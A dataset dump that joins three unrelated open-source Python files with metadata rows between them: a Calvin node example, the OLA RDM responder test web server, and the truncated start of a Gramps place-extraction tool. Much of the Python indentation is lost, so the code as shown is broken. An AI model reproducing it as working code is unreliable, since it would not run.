# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.utilities.nodecontrol import dispatch_node
from calvin.utilities import utils
import time
# create one node
node_1 = dispatch_node(uri="calvinip://localhost:5000", control_uri="http://localhost:5001",
attributes=["node/affiliation/owner/me", "node/affiliation/name/node-1"])
# send 'new actor' command to node
counter_id = utils.new_actor(node_1, 'std.Counter', 'counter')
# send 'new actor' command to node
output_id = utils.new_actor(node_1, 'io.StandardOut', 'output')
# send 'connect' command to node
utils.connect(node_1, output_id, 'token', node_1.id, counter_id, 'integer')
# run the app for 3 seconds
time.sleep(3)
# send quit to the node
utils.quit(node_1)
| apache-2.0 | 3,418,883,178,260,327,400 | 33.368421 | 96 | 0.725881 | false |
mlba-team/open-lighting | tools/rdm/rdm_test_server.py | 1 | 30914 | #!/usr/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# rdm_test_server.py
# Copyright (C) 2012 Ravindra Nath Kakarla & Simon Newton
import cgi
import json
import logging
import mimetypes
import os
import pprint
import re
import signal
import stat
import sys
import textwrap
import threading
import traceback
import urlparse
from datetime import datetime
from optparse import OptionParser, OptionGroup, OptionValueError
from threading import Condition, Event, Lock, Thread
from time import time, sleep
from wsgiref.simple_server import make_server
from ola.UID import UID
from ola.ClientWrapper import ClientWrapper, SelectServer
from ola.OlaClient import OlaClient, OLADNotRunningException
from ola import PidStore
from ola.testing.rdm.DMXSender import DMXSender
from ola.testing.rdm import DataLocation
from ola.testing.rdm import ResponderTest
from ola.testing.rdm import TestDefinitions
from ola.testing.rdm import TestLogger
from ola.testing.rdm import TestRunner
from ola.testing.rdm.ModelCollector import ModelCollector
from ola.testing.rdm.TestCategory import TestCategory
from ola.testing.rdm.TestState import TestState
__author__ = '[email protected] (Ravindra Nath Kakarla)'
settings = {
'PORT': 9099,
}
class Error(Exception):
"""Base exception class."""
class ServerException(Error):
"""Indicates a problem handling the request."""
class OLAThread(Thread):
"""The thread which runs the OLA Client."""
def __init__(self, ola_client):
super(OLAThread, self).__init__()
self._client = ola_client
self._ss = None # created in run()
def run(self):
self._ss = SelectServer()
self._ss.AddReadDescriptor(self._client.GetSocket(),
self._client.SocketReady)
self._ss.Run()
logging.info('OLA thread finished')
def Stop(self):
if self._ss is None:
logging.critical('OLAThread.Stop() called before thread was running')
return
logging.info('Stopping OLA thread')
self._ss.Terminate()
def Execute(self, cb):
self._ss.Execute(cb)
def FetchUniverses(self):
return self.MakeSyncClientCall(self._client.FetchUniverses)
def FetchUIDList(self, *args):
return self.MakeSyncClientCall(self._client.FetchUIDList, *args)
def RunRDMDiscovery(self, *args):
return self.MakeSyncClientCall(self._client.RunRDMDiscovery, *args)
def MakeSyncClientCall(self, method, *method_args):
"""Turns an async call into a sync (blocking one).
Args:
wrapper: the ClientWrapper object
method: the method to call
*method_args: Any arguments to pass to the method
Returns:
The arguments that would have been passed to the callback function.
"""
global args_result
event = Event()
def Callback(*args, **kwargs):
global args_result
args_result = args
event.set()
def RunMethod():
method(*method_args, callback=Callback)
self._ss.Execute(RunMethod)
event.wait()
return args_result
class RDMTestThread(Thread):
"""The RDMResponder tests are closely coupled to the Wrapper (yuck!). So we
need to run this all in a separate thread. This is all a bit of a hack and
you'll get into trouble if multiple things are running at once...
"""
RUNNING, COMPLETED, ERROR = range(3)
TESTS, COLLECTOR = range(2)
def __init__(self, pid_store, logs_directory):
super(RDMTestThread, self).__init__()
self._pid_store = pid_store
self._logs_directory = logs_directory
self._terminate = False
self._request = None
# guards _terminate and _request
self._cv = Condition()
self._wrapper = None
self._test_state_lock = Lock() # guards _test_state
self._test_state = {}
def Stop(self):
self._cv.acquire()
self._terminate = True
self._cv.notify()
self._cv.release()
def ScheduleTests(self, universe, uid, test_filter, broadcast_write_delay,
dmx_frame_rate, slot_count):
"""Schedule the tests to be run. Callable from any thread. Callbable by any
thread.
Returns:
An error message, or None if the tests were scheduled.
"""
if not self._CheckIfConnected():
return 'Lost connection to OLAD'
self._cv.acquire()
if self._request is not None:
self._cv.release()
return 'Existing request pending'
self._request = lambda : self._RunTests(universe, uid, test_filter,
broadcast_write_delay,
dmx_frame_rate, slot_count)
self._cv.notify()
self._cv.release()
return None
def ScheduleCollector(self, universe, skip_queued_messages):
"""Schedule the collector to run on a universe. Callable by any thread.
Returns:
An error message, or None if the collection was scheduled.
"""
if not self._CheckIfConnected():
return 'Lost connection to OLAD'
self._cv.acquire()
if self._request is not None:
self._cv.release()
return 'Existing request pending'
self._request = lambda : self._RunCollector(universe, skip_queued_messages)
self._cv.notify()
self._cv.release()
return None
def Stat(self):
"""Check the state of the tests. Callable by any thread.
Returns:
The status of the tests.
"""
self._test_state_lock.acquire()
state = dict(self._test_state)
self._test_state_lock.release()
return state
def run(self):
self._wrapper = ClientWrapper()
self._collector = ModelCollector(self._wrapper, self._pid_store)
while True:
self._cv.acquire()
if self._terminate:
logging.info('quitting test thread')
self._cv.release()
        return
if self._request is not None:
request = self._request
self._request = None
self._cv.release()
request()
continue
# nothing to do, go into the wait
self._cv.wait()
self._cv.release()
def _UpdateStats(self, tests_completed, total_tests):
self._test_state_lock.acquire()
self._test_state['tests_completed'] = tests_completed
self._test_state['total_tests'] = total_tests
self._test_state_lock.release()
def _RunTests(self, universe, uid, test_filter, broadcast_write_delay,
dmx_frame_rate, slot_count):
self._test_state_lock.acquire()
self._test_state = {
'action': self.TESTS,
'tests_completed': 0,
'total_tests': None,
'state': self.RUNNING,
'duration': 0,
}
start_time = datetime.now()
self._test_state_lock.release()
runner = TestRunner.TestRunner(universe, uid, broadcast_write_delay,
self._pid_store, self._wrapper)
for test in TestRunner.GetTestClasses(TestDefinitions):
runner.RegisterTest(test)
dmx_sender = None
if dmx_frame_rate > 0 and slot_count > 0:
      logging.info('Starting DMXSender with slot count %d and fps of %d' %
(slot_count, dmx_frame_rate))
dmx_sender = DMXSender(self._wrapper, universe, dmx_frame_rate, slot_count)
try:
tests, unused_device = runner.RunTests(test_filter, False, self._UpdateStats)
except Exception as e:
self._test_state_lock.acquire()
self._test_state['state'] = self.ERROR
self._test_state['exception'] = str(e)
self._test_state['traceback'] = traceback.format_exc()
self._test_state_lock.release()
return
finally:
if dmx_sender is not None:
dmx_sender.Stop()
timestamp = int(time())
end_time = datetime.now()
test_parameters = {
'broadcast_write_delay': broadcast_write_delay,
'dmx_frame_rate': dmx_frame_rate,
'dmx_slot_count': slot_count,
}
log_saver = TestLogger.TestLogger(self._logs_directory)
logs_saved = True
try:
log_saver.SaveLog(uid, timestamp, tests, test_parameters)
    except TestLogger.TestLoggerException:
logs_saved = False
self._test_state_lock.acquire()
# we can't use total_seconds() since it requires Python 2.7
time_delta = end_time - start_time
self._test_state['duration'] = (
time_delta.seconds + time_delta.days * 24 * 3600)
self._test_state['state'] = self.COMPLETED
self._test_state['tests'] = tests
self._test_state['logs_saved'] = logs_saved
self._test_state['timestamp'] = timestamp
self._test_state['uid'] = uid
self._test_state_lock.release()
def _RunCollector(self, universe, skip_queued_messages):
"""Run the device model collector for a universe."""
logging.info('Collecting for %d' % universe)
self._test_state_lock.acquire()
self._test_state = {
'action': self.COLLECTOR,
'state': self.RUNNING,
}
self._test_state_lock.release()
try:
output = self._collector.Run(universe, skip_queued_messages)
except Exception as e:
self._test_state_lock.acquire()
self._test_state['state'] = self.ERROR
self._test_state['exception'] = str(e)
self._test_state['traceback'] = traceback.format_exc()
self._test_state_lock.release()
return
self._test_state_lock.acquire()
self._test_state['state'] = self.COMPLETED
self._test_state['output'] = output
self._test_state_lock.release()
def _CheckIfConnected(self):
"""Check if the client is connected to olad.
Returns:
True if connected, False otherwise.
"""
# TODO(simon): add this check, remember it needs locking.
return True
class HTTPRequest(object):
"""Represents a HTTP Request."""
def __init__(self, environ):
self._environ = environ
self._params = None
def Path(self):
"""Return the path for the request."""
return self._environ['PATH_INFO']
def GetParam(self, param, default=None):
"""This only returns the first value for each param.
Args:
param: the name of the url parameter.
default: the value to return if the parameter wasn't supplied.
Returns:
The value of the url param, or None if it wasn't present.
"""
if self._params is None:
self._params = {}
get_params = urlparse.parse_qs(self._environ['QUERY_STRING'])
for p in get_params:
self._params[p] = get_params[p][0]
return self._params.get(param, default)
class HTTPResponse(object):
"""Represents a HTTP Response."""
OK = '200 OK'
ERROR = '500 Error'
DENIED = '403 Denied'
NOT_FOUND = '404 Not Found'
PERMANENT_REDIRECT = '301 Moved Permanently'
def __init__(self):
self._status = None
    self._headers = {}
self._content_type = None
self._data = []
def SetStatus(self, status):
self._status = status
def GetStatus(self):
return self._status
def SetHeader(self, header, value):
self._headers[header] = value
def GetHeaders(self):
headers = []
for header, value in self._headers.iteritems():
headers.append((header, value))
return headers
def AppendData(self, data):
self._data.append(data)
def Data(self):
return self._data
class RequestHandler(object):
"""The base request handler class."""
def HandleRequest(self, request, response):
pass
class RedirectHandler(RequestHandler):
"""Serve a 301 redirect."""
def __init__(self, new_location):
self._new_location = new_location
def HandleRequest(self, request, response):
response.SetStatus(HTTPResponse.PERMANENT_REDIRECT)
response.SetHeader('Location', self._new_location)
class StaticFileHandler(RequestHandler):
"""A class which handles requests for static files."""
PREFIX = '/static/'
def __init__(self, static_dir):
self._static_dir = static_dir
def HandleRequest(self, request, response):
path = request.Path()
if not path.startswith(self.PREFIX):
response.SetStatus(HTTPResponse.NOT_FOUND)
return
# strip off /static
path = path[len(self.PREFIX):]
    # This is important as it ensures we can't access arbitrary files
filename = os.path.abspath(os.path.join(self._static_dir, path))
if (not filename.startswith(self._static_dir) or
not os.path.exists(filename) or
not os.path.isfile(filename)):
response.SetStatus(HTTPResponse.NOT_FOUND)
return
elif not os.access(filename, os.R_OK):
response.SetStatus(HTTPResponse.DENIED)
return
else:
mimetype, encoding = mimetypes.guess_type(filename)
if mimetype:
response.SetHeader('Content-type', mimetype)
if encoding:
response.SetHeader('Content-encoding', encoding)
stats = os.stat(filename)
response.SetStatus(HTTPResponse.OK)
response.SetHeader('Content-length', str(stats.st_size))
response.AppendData(open(filename, 'rb').read())
class JsonRequestHandler(RequestHandler):
"""A class which handles Json requests."""
def HandleRequest(self, request, response):
response.SetHeader('Cache-Control', 'no-cache')
response.SetHeader('Content-type', 'application/json')
try:
json_data = self.GetJson(request, response)
response.AppendData(json.dumps(json_data, sort_keys = True))
except ServerException as e:
# for json requests, rather than returning 500s we return the error as
# json
response.SetStatus(HTTPResponse.OK)
json_data = {
'status': False,
'error': str(e),
}
response.AppendData(json.dumps(json_data, sort_keys = True))
def RaiseExceptionIfMissing(self, request, param):
"""Helper method to raise an exception if the param is missing."""
value = request.GetParam(param)
if value is None:
raise ServerException('Missing parameter: %s' % param)
return value
def GetJson(self, request, response):
"""Subclasses implement this."""
pass
class OLAServerRequestHandler(JsonRequestHandler):
"""Catches OLADNotRunningException and handles them gracefully."""
def __init__(self, ola_thread):
    self._thread = ola_thread
def GetThread(self):
return self._thread
def HandleRequest(self, request, response):
try:
super(OLAServerRequestHandler, self).HandleRequest(request, response)
except OLADNotRunningException as e:
response.SetStatus(HTTPResponse.OK)
json_data = {
'status': False,
'error': 'The OLA Server instance is no longer running',
}
response.AppendData(json.dumps(json_data, sort_keys = True))
class TestDefinitionsHandler(JsonRequestHandler):
"""Return a JSON list of test definitions."""
def GetJson(self, request, response):
response.SetStatus(HTTPResponse.OK)
tests = [t.__name__ for t in TestRunner.GetTestClasses(TestDefinitions)]
return {
'test_defs': tests,
'status': True,
}
class GetUniversesHandler(OLAServerRequestHandler):
"""Return a JSON list of universes."""
def GetJson(self, request, response):
status, universes = self.GetThread().FetchUniverses()
if not status.Succeeded():
raise ServerException('Failed to fetch universes from server')
response.SetStatus(HTTPResponse.OK)
return {
'universes': [u.__dict__ for u in universes],
'status': True,
}
class GetDevicesHandler(OLAServerRequestHandler):
"""Return a JSON list of RDM devices."""
def GetJson(self, request, response):
universe_param = request.GetParam('u')
if universe_param is None:
raise ServerException('Missing universe parameter: u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, uids = self.GetThread().FetchUIDList(universe)
if not status.Succeeded():
raise ServerException('Invalid universe ID!')
response.SetStatus(HTTPResponse.OK)
return {
'uids': [str(u) for u in uids],
'status': True,
}
class RunDiscoveryHandler(OLAServerRequestHandler):
"""Runs the RDM Discovery process."""
def GetJson(self, request, response):
universe_param = request.GetParam('u')
if universe_param is None:
raise ServerException('Missing universe parameter: u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, uids = self.GetThread().RunRDMDiscovery(universe, True)
if not status.Succeeded():
raise ServerException('Invalid universe ID!')
response.SetStatus(HTTPResponse.OK)
return {
'uids': [str(u) for u in uids],
'status': True,
}
class DownloadResultsHandler(RequestHandler):
"""A class which handles requests to download test results."""
def HandleRequest(self, request, response):
uid_param = request.GetParam('uid') or ''
uid = UID.FromString(uid_param)
if uid is None:
raise ServerException('Missing uid parameter: uid')
timestamp = request.GetParam('timestamp')
if timestamp is None:
raise ServerException('Missing timestamp parameter: timestamp')
include_debug = request.GetParam('debug')
include_description = request.GetParam('description')
category = request.GetParam('category')
test_state = request.GetParam('state')
reader = TestLogger.TestLogger(settings['log_directory'])
try:
output = reader.ReadAndFormat(uid, timestamp, category,
test_state, include_debug,
include_description)
except TestLogger.TestLoggerException as e:
raise ServerException(e)
filename = ('%04x-%08x.%s.txt' %
(uid.manufacturer_id, uid.device_id, timestamp))
response.SetStatus(HTTPResponse.OK)
response.SetHeader('Content-disposition',
'attachment; filename="%s"' % filename)
response.SetHeader('Content-type', 'text/plain')
response.SetHeader('Content-length', '%d' % len(output))
response.AppendData(output)
class RunTestsHandler(OLAServerRequestHandler):
"""Run the RDM tests."""
def __init__(self, ola_thread, test_thread):
super(RunTestsHandler, self).__init__(ola_thread)
self._test_thread = test_thread
def GetJson(self, request, response):
"""Check if this is a RunTests or StatTests request."""
path = request.Path()
if path == '/RunTests':
return self.RunTests(request, response)
if path == '/RunCollector':
return self.RunCollector(request, response)
elif path == '/StatTests':
return self.StatTests(request, response)
elif path == '/StatCollector':
return self.StatCollector(request, response)
else:
logging.error('Got invalid request for %s' % path)
raise ServerException('Invalid request')
def StatTests(self, request, response):
"""Return the status of the running tests."""
response.SetStatus(HTTPResponse.OK)
status = self._test_thread.Stat()
if status is None:
return {}
json_data = {'status': True}
if status['state'] == RDMTestThread.COMPLETED:
json_data['UID'] = str(status['uid'])
json_data['duration'] = status['duration']
json_data['completed'] = True
json_data['logs_disabled'] = not status['logs_saved']
      json_data['timestamp'] = status['timestamp']
self._FormatTestResults(status['tests'], json_data)
elif status['state'] == RDMTestThread.ERROR:
json_data['completed'] = True
json_data['exception'] = status['exception']
json_data['traceback'] = status.get('traceback', '')
else:
json_data['completed'] = False
json_data['tests_completed'] = status['tests_completed']
json_data['total_tests'] = status['total_tests']
return json_data
def StatCollector(self, request, response):
"""Return the status of the running collector process."""
response.SetStatus(HTTPResponse.OK)
status = self._test_thread.Stat()
if status is None:
return {}
json_data = {'status': True}
if status['state'] == RDMTestThread.COMPLETED:
json_data['completed'] = True
json_data['output'] = pprint.pformat(status['output'])
elif status['state'] == RDMTestThread.ERROR:
json_data['completed'] = True
json_data['exception'] = status['exception']
json_data['traceback'] = status.get('traceback', '')
else:
json_data['completed'] = False
return json_data
def RunCollector(self, request, response):
"""Handle a /RunCollector request."""
universe = self._CheckValidUniverse(request)
skip_queued = request.GetParam('skip_queued')
if skip_queued is None or skip_queued.lower() == 'false':
skip_queued = False
else:
skip_queued = True
ret = self._test_thread.ScheduleCollector(universe, skip_queued)
if ret is not None:
raise ServerException(ret)
response.SetStatus(HTTPResponse.OK)
return {'status': True}
def RunTests(self, request, response):
"""Handle a /RunTests request."""
universe = self._CheckValidUniverse(request)
uid_param = self.RaiseExceptionIfMissing(request, 'uid')
uid = UID.FromString(uid_param)
if uid is None:
raise ServerException('Invalid uid: %s' % uid_param)
# the tests to run, None means all
test_filter = request.GetParam('t')
if test_filter is not None:
if test_filter == 'all':
test_filter = None
else:
test_filter = set(test_filter.split(','))
broadcast_write_delay = request.GetParam('w')
if broadcast_write_delay is None:
broadcast_write_delay = 0
try:
broadcast_write_delay = int(broadcast_write_delay)
except ValueError:
raise ServerException('Invalid broadcast write delay')
slot_count = request.GetParam('c')
if slot_count is None:
slot_count = 0
try:
slot_count = int(slot_count)
except ValueError:
raise ServerException('Invalid slot count')
if slot_count not in range(1, 513):
      raise ServerException('Slot count not in range 1..512')
dmx_frame_rate = request.GetParam('f')
if dmx_frame_rate is None:
dmx_frame_rate = 0
try:
dmx_frame_rate = int(dmx_frame_rate)
except ValueError:
raise ServerException('Invalid DMX frame rate')
ret = self._test_thread.ScheduleTests(universe, uid, test_filter,
broadcast_write_delay,
dmx_frame_rate, slot_count)
if ret is not None:
raise ServerException(ret)
response.SetStatus(HTTPResponse.OK)
return {'status': True}
def _CheckValidUniverse(self, request):
"""Check that the universe paramter is present and refers to a valid
universe.
Args:
request: the HTTPRequest object.
Returns:
      The sanitized universe id.
Raises:
ServerException if the universe isn't valid or doesn't exist.
"""
universe_param = self.RaiseExceptionIfMissing(request, 'u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, universes = self.GetThread().FetchUniverses()
if not status.Succeeded():
raise ServerException('Failed to fetch universes from server')
if universe not in [u.id for u in universes]:
raise ServerException("Universe %d doesn't exist" % universe)
return universe
def _FormatTestResults(self, tests, json_data):
results = []
stats_by_catg = {}
passed = 0
failed = 0
broken = 0
not_run = 0
for test in tests:
state = test.state.__str__()
category = test.category.__str__()
stats_by_catg.setdefault(category, {'passed': 0, 'total': 0})
if test.state == TestState.PASSED:
passed += 1
stats_by_catg[category]['passed'] += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.FAILED:
failed += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.BROKEN:
broken += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.NOT_RUN:
not_run += 1
results.append({
'definition': test.__str__(),
'state': state,
'category': category,
'warnings': [cgi.escape(w) for w in test.warnings],
'advisories': [cgi.escape(a) for a in test.advisories],
'debug': [cgi.escape(d) for d in test._debug],
'doc': cgi.escape(test.__doc__),
}
)
stats = {
'total': len(tests),
'passed': passed,
'failed': failed,
'broken': broken,
'not_run': not_run,
}
json_data.update({
'test_results': results,
'stats': stats,
'stats_by_catg': stats_by_catg,
})
class Application(object):
"""Creates a new Application."""
def __init__(self):
# dict of path to handler
self._handlers = {}
self._regex_handlers = []
def RegisterHandler(self, path, handler):
self._handlers[path] = handler
def RegisterRegex(self, path_regex, handler):
self._regex_handlers.append((path_regex, handler))
def HandleRequest(self, environ, start_response):
"""Create a new TestServerApplication, passing in the OLA Wrapper."""
request = HTTPRequest(environ)
response = HTTPResponse()
self.DispatchRequest(request, response)
start_response(response.GetStatus(), response.GetHeaders())
return response.Data()
def DispatchRequest(self, request, response):
path = request.Path()
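    # Exact path matches take priority; otherwise the regex handlers are tried
    # in the order they were registered.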
if path in self._handlers:
self._handlers[path](request, response)
return
else:
for pattern, handler in self._regex_handlers:
if re.match(pattern, path):
handler(request, response)
return
response.SetStatus(HTTPResponse.NOT_FOUND)
def BuildApplication(ola_thread, test_thread):
"""Construct the application and add the handlers."""
app = Application()
app.RegisterHandler('/',
RedirectHandler('/static/rdmtests.html').HandleRequest)
app.RegisterHandler('/favicon.ico',
RedirectHandler('/static/images/favicon.ico').HandleRequest)
app.RegisterHandler('/GetTestDefs',
TestDefinitionsHandler().HandleRequest)
app.RegisterHandler('/GetUnivInfo',
GetUniversesHandler(ola_thread).HandleRequest)
app.RegisterHandler('/GetDevices',
GetDevicesHandler(ola_thread).HandleRequest)
app.RegisterHandler('/RunDiscovery',
RunDiscoveryHandler(ola_thread).HandleRequest)
app.RegisterHandler('/DownloadResults',
DownloadResultsHandler().HandleRequest)
run_tests_handler = RunTestsHandler(ola_thread, test_thread)
app.RegisterHandler('/RunCollector', run_tests_handler.HandleRequest)
app.RegisterHandler('/RunTests', run_tests_handler.HandleRequest)
app.RegisterHandler('/StatCollector', run_tests_handler.HandleRequest)
app.RegisterHandler('/StatTests', run_tests_handler.HandleRequest)
app.RegisterRegex('/static/.*',
StaticFileHandler(settings['www_dir']).HandleRequest)
return app
def parse_options():
"""
Parse Command Line options
"""
usage = 'Usage: %prog [options]'
description = textwrap.dedent("""\
    Starts the TestServer (a simple web server) which runs a series of tests on
    an RDM responder and displays the results in a Web UI.
This requires the OLA server to be running, and the RDM device to have been
detected. You can confirm this by running ola_rdm_discover -u
UNIVERSE. This will send SET commands to the broadcast UIDs which means
the start address, device label etc. will be changed for all devices
connected to the responder. Think twice about running this on your
production lighting rig.
""")
parser = OptionParser(usage, description=description)
parser.add_option('-p', '--pid_store', metavar='FILE',
help='The file to load the PID definitions from.')
parser.add_option('-d', '--www_dir', default=DataLocation.location,
help='The root directory to serve static files.')
parser.add_option('-l', '--log_directory',
default=os.path.abspath('/tmp/ola-rdm-logs'),
help='The directory to store log files.')
parser.add_option('--world_writeable',
action="store_true",
help='Make the log directory world writeable.')
options, args = parser.parse_args()
return options
def SetupLogDirectory(options):
"""Setup the log dir."""
# Setup the log dir, or display an error
log_directory = options.log_directory
if not os.path.exists(log_directory):
try:
os.makedirs(log_directory)
if options.world_writeable:
stat_result = os.stat(log_directory)
os.chmod(log_directory, stat_result.st_mode | stat.S_IWOTH)
except OSError:
logging.error(
'Failed to create %s for RDM logs. Logging will be disabled.' %
options.log_directory)
elif not os.path.isdir(options.log_directory):
logging.error('Log directory invalid: %s. Logging will be disabled.' %
options.log_directory)
elif not os.access(options.log_directory, os.W_OK):
logging.error(
'Unable to write to log directory: %s. Logging will be disabled.' %
options.log_directory)
def main():
options = parse_options()
settings.update(options.__dict__)
pid_store = PidStore.GetStore(options.pid_store, ('pids.proto'))
logging.basicConfig(level=logging.INFO, format='%(message)s')
SetupLogDirectory(options)
#Check olad status
logging.info('Checking olad status')
try:
ola_client = OlaClient()
except OLADNotRunningException:
logging.error('Error creating connection with olad. Is it running?')
sys.exit(127)
ola_thread = OLAThread(ola_client)
ola_thread.start()
test_thread = RDMTestThread(pid_store, settings['log_directory'])
test_thread.start()
app = BuildApplication(ola_thread, test_thread)
httpd = make_server('', settings['PORT'], app.HandleRequest)
logging.info('Running RDM Tests Server on %s:%s' %
('127.0.0.1', httpd.server_port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
ola_thread.Stop()
test_thread.Stop()
ola_thread.join()
test_thread.join()
if __name__ == '__main__':
main()
| lgpl-2.1 | -8,669,926,433,961,221,000 | 30.512742 | 83 | 0.659604 | false |
arunkgupta/gramps | gramps/plugins/tool/extractcity.py | 1 | 26002 | # -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""Tools/Database Processing/Extract Place Data from a Place Title"""
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
import re
from gramps.gen.ggettext import gettext as _
#-------------------------------------------------------------------------
#
# gnome/gtk
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
from gi.repository import GObject
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.db import DbTxn
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.display import display_help
from gramps.gui.plug import tool
from gramps.gui.utils import ProgressMeter
from gramps.gui.glade import Glade
CITY_STATE_ZIP = re.compile("((\w|\s)+)\s*,\s*((\w|\s)+)\s*(,\s*((\d|-)+))", re.UNICODE)
CITY_STATE = re.compile("((?:\w|\s)+(?:-(?:\w|\s)+)*),((?:\w|\s)+)", re.UNICODE)
CITY_LAEN = re.compile("((?:\w|\s)+(?:-(?:\w|\s)+)*)\(((?:\w|\s)+)", re.UNICODE)
STATE_ZIP = re.compile("(.+)\s+([\d-]+)", re.UNICODE)
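# Roughly, these patterns split a place title such as "New York, NY 10000":
# CITY_STATE separates the city from the rest, STATE_ZIP then peels a trailing
# postal code off the state/province, and CITY_LAEN handles the Swedish
# "Stockholm (A)" form described in the ExtractCity docstring below.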
COUNTRY = ( _(u"United States of America"), _(u"Canada"), _(u"France"),_(u"Sweden"))
STATE_MAP = {
u"AL" : (u"Alabama", 0),
u"AL." : (u"Alabama", 0),
u"ALABAMA" : (u"Alabama", 0),
u"AK" : (u"Alaska" , 0),
u"AK." : (u"Alaska" , 0),
u"ALASKA" : (u"Alaska" , 0),
u"AS" : (u"American Samoa", 0),
u"AS." : (u"American Samoa", 0),
u"AMERICAN SAMOA": (u"American Samoa", 0),
u"AZ" : (u"Arizona", 0),
u"AZ." : (u"Arizona", 0),
u"ARIZONA" : (u"Arizona", 0),
u"AR" : (u"Arkansas" , 0),
u"AR." : (u"Arkansas" , 0),
u"ARKANSAS" : (u"Arkansas" , 0),
u"ARK." : (u"Arkansas" , 0),
u"ARK" : (u"Arkansas" , 0),
u"CA" : (u"California" , 0),
u"CA." : (u"California" , 0),
u"CALIFORNIA" : (u"California" , 0),
u"CO" : (u"Colorado" , 0),
u"COLO" : (u"Colorado" , 0),
u"COLO." : (u"Colorado" , 0),
u"COLORADO" : (u"Colorado" , 0),
u"CT" : (u"Connecticut" , 0),
u"CT." : (u"Connecticut" , 0),
u"CONNECTICUT" : (u"Connecticut" , 0),
u"DE" : (u"Delaware" , 0),
u"DE." : (u"Delaware" , 0),
u"DELAWARE" : (u"Delaware" , 0),
u"DC" : (u"District of Columbia" , 0),
u"D.C." : (u"District of Columbia" , 0),
u"DC." : (u"District of Columbia" , 0),
u"DISTRICT OF COLUMBIA" : (u"District of Columbia" , 0),
u"FL" : (u"Florida" , 0),
u"FL." : (u"Florida" , 0),
u"FLA" : (u"Florida" , 0),
u"FLA." : (u"Florida" , 0),
u"FLORIDA" : (u"Florida" , 0),
u"GA" : (u"Georgia" , 0),
u"GA." : (u"Georgia" , 0),
u"GEORGIA" : (u"Georgia" , 0),
u"GU" : (u"Guam" , 0),
u"GU." : (u"Guam" , 0),
u"GUAM" : (u"Guam" , 0),
u"HI" : (u"Hawaii" , 0),
u"HI." : (u"Hawaii" , 0),
u"HAWAII" : (u"Hawaii" , 0),
u"ID" : (u"Idaho" , 0),
u"ID." : (u"Idaho" , 0),
u"IDAHO" : (u"Idaho" , 0),
u"IL" : (u"Illinois" , 0),
u"IL." : (u"Illinois" , 0),
u"ILLINOIS" : (u"Illinois" , 0),
u"ILL" : (u"Illinois" , 0),
u"ILL." : (u"Illinois" , 0),
u"ILLS" : (u"Illinois" , 0),
u"ILLS." : (u"Illinois" , 0),
u"IN" : (u"Indiana" , 0),
u"IN." : (u"Indiana" , 0),
u"INDIANA" : (u"Indiana" , 0),
u"IA" : (u"Iowa" , 0),
u"IA." : (u"Iowa" , 0),
u"IOWA" : (u"Iowa" , 0),
u"KS" : (u"Kansas" , 0),
u"KS." : (u"Kansas" , 0),
u"KANSAS" : (u"Kansas" , 0),
u"KY" : (u"Kentucky" , 0),
u"KY." : (u"Kentucky" , 0),
u"KENTUCKY" : (u"Kentucky" , 0),
u"LA" : (u"Louisiana" , 0),
u"LA." : (u"Louisiana" , 0),
u"LOUISIANA" : (u"Louisiana" , 0),
u"ME" : (u"Maine" , 0),
u"ME." : (u"Maine" , 0),
u"MAINE" : (u"Maine" , 0),
u"MD" : (u"Maryland" , 0),
u"MD." : (u"Maryland" , 0),
u"MARYLAND" : (u"Maryland" , 0),
u"MA" : (u"Massachusetts" , 0),
u"MA." : (u"Massachusetts" , 0),
u"MASSACHUSETTS" : (u"Massachusetts" , 0),
u"MI" : (u"Michigan" , 0),
u"MI." : (u"Michigan" , 0),
u"MICH." : (u"Michigan" , 0),
u"MICH" : (u"Michigan" , 0),
u"MN" : (u"Minnesota" , 0),
u"MN." : (u"Minnesota" , 0),
u"MINNESOTA" : (u"Minnesota" , 0),
u"MS" : (u"Mississippi" , 0),
u"MS." : (u"Mississippi" , 0),
u"MISSISSIPPI" : (u"Mississippi" , 0),
u"MO" : (u"Missouri" , 0),
u"MO." : (u"Missouri" , 0),
u"MISSOURI" : (u"Missouri" , 0),
u"MT" : (u"Montana" , 0),
u"MT." : (u"Montana" , 0),
u"MONTANA" : (u"Montana" , 0),
u"NE" : (u"Nebraska" , 0),
u"NE." : (u"Nebraska" , 0),
u"NEBRASKA" : (u"Nebraska" , 0),
u"NV" : (u"Nevada" , 0),
u"NV." : (u"Nevada" , 0),
